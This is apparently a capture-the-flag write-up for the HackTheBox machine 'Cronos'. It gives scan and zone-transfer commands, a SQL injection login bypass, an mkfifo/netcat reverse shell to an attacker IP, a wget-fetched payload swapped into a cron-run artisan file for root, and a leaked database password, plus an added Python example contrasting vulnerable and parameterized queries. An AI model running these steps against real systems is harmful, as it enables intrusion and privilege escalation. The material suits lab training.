nmap -A -p- -oA output 10.129.93.50 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -T4 -oA output 10.129.93.50 --script=vuln -v

nmap -sT -sV -sC -Pn -p- 10.129.93.50

10.129.93.50 server 10.129.93.50 cronos.htb

dig axfr @10.129.93.50 cronos.htb

echo "10.129.93.50 www.cronos.htb ns1.cronos.htb admin.cronos.htb cronos.htb" | sudo tee -a /etc/hosts

http://cronos.htb/

I tried a handful of SQL injection payloads. While ' or '1'='1 doesn’t work, ' or 1=1-- - does. That means it’s likely querying the database with
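
The behaviour noted above, as an added example that is not part of the original writeup or the target application: a constructed login check in Python against an in-memory SQLite database, where the table, column names and query shape are assumptions. It shows why the quote-balanced payload fails (AND binds tighter than OR, so the password comparison still applies) while the comment payload removes the password check, and that a parameterized query rejects both.

```python
import hashlib
import sqlite3


def _digest(password):
    # Assumption: the application transforms the password before comparing it.
    # SHA-256 keeps the example short; real code should use a password-hashing function.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    # Constructed sample data: one user with a constructed password.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", _digest("constructed-secret")))
    return db


def login_vulnerable(db, username, password):
    # Assumed vulnerable shape: the username is concatenated into the SQL text.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + _digest(password) + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # Hardened form: user input is bound as data and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, _digest(password))).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for payload in ("' or '1'='1", "' or 1=1-- -"):
        # Payload 1 parses as: username='' OR ('1'='1' AND password='<hash>') -> no row.
        # Payload 2 parses as: username='' OR 1=1, with the rest commented out -> row.
        print(repr(payload),
              "vulnerable:", login_vulnerable(db, payload, "x"),
              "parameterized:", login_parameterized(db, payload, "x"))
```
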

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.175 4444>/tmp/f
rlwrap nc -lvnp 4444

python -c "import pty; pty.spawn('/bin/bash')"
Press Ctrl+Z, then run stty raw -echo && fg

python3 -m http.server 8888

www-data@cronos:/dev/shm$ bash LinEnum.sh

Found a command running. The command is:
php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

define('DB_USERNAME', 'admin');
define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');

www-data@cronos:/var/www/laravel$ wget http://10.10.14.175:8888/artisan.php
www-data@cronos:/var/www/laravel$ mv artisan.php artisan
www-data@cronos:/var/www/laravel$ chmod a+x artisan

nc -lvnp 1234

copyright©2022 Cu3rv0x all rights reserved